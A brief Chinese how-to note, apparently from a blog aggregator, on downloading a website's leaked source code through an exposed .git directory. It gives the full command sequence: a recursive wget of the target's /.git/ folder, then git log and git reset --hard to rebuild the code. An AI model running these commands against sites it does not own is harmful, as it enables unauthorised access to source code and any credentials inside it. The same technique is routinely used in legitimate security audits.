如何利用.git文件夾下載整個網站泄漏的源碼

參考: https://www.jianshu.com/p/edae09535ea3 完整命令: wget -r -p -np -k http://www.xxx.com/.git/ #先遞歸批量下載.git目錄 git log #查看網站的提交記錄 git reset --hard [log hash] #恢復到指定版本號 其中--recursive(遞歸) -k, --convert-link
相關文章
相關標籤/搜索